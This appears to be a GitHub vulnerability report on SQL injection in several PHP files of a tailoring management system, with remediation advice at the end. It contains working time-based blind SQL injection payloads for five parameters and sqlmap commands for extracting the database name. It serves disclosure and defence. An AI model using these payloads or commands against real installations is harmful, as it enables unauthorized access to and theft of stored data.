Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 Multiple php files found GET type SQL injection #7

Open
magic2353112890 opened this issue Jan 24, 2025 · 0 comments

Comments

@magic2353112890
Copy link
Owner

magic2353112890 commented Jan 24, 2025

Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 Multiple php files found GET type SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Tailoring Management System Project In PHP With Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • lyp123

Vulnerable File

  • deldoc.php, customerview.php, typedelete.php, templatedelete.php, expview.php, incview.php, partview.php, staffview.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • GET type SQL injection

Root Cause

  • A GET SQL injection vulnerability was found in multiple PHP files in the Tailoring Management System Project In PHP with Source Code project. The reason for this issue is that an attacker injects malicious code from the parameter "id" or "expid" or "incid" or "typeid" or "staffid" and uses it directly in SQL queries without proper sanitization or validation. This allows an attacker to forge input values to manipulate SQL queries and perform unauthorized actions.

1

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • Due to insufficient user input validation for "id" or "expid" or "incid" or "typeid" or "staffid" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

Vulnerability details and POC

GET /tailor/deldoc.php?id=1 HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=dm0v2m9bskme1h59n1vd9jk6n3
Connection: close

Vulnerability type:

  • time-based blind

Vulnerability location:

  • "id" or "expid" or "incid" or "typeid" or "staffid" parameter

Payload:

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8695 FROM (SELECT(SLEEP(5)))MgIe) AND 'kaZT'='kaZT

Parameter: expid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: expid=1' AND (SELECT 3590 FROM (SELECT(SLEEP(5)))alqt) AND 'NnDu'='NnDu

Parameter: incid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: incid=1' AND (SELECT 1197 FROM (SELECT(SLEEP(5)))WCAk) AND 'zWDb'='zWDb

Parameter: typeid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: typeid=1' AND (SELECT 7717 FROM (SELECT(SLEEP(5)))RUpZ) AND 'XYNO'='XYNO

Parameter: staffid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: staffid=1' AND (SELECT 3951 FROM (SELECT(SLEEP(5)))Asyc) AND 'eqma'='eqma

2

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

sqlmap.py -u http://x.x.x.x/tailor/deldoc.php?id=1 --current-db  --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/customerview.php?id=1 --current-db  --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/typedelete.php?id=100 --current-db  --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/templatedelete.php?id=100 --current-db  --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/expview.php?expid=1 --current-db  --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/incview.php?incid=1 --current-db  --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/partview.php?typeid=1 --current-db  --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"
sqlmap.py -u http://x.x.x.x/tailor/staffview.php?staffid=1 --current-db  --cookie="PHPSESSID=dm0v2m9b
skme1h59n1vd9jk6n3"

3

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant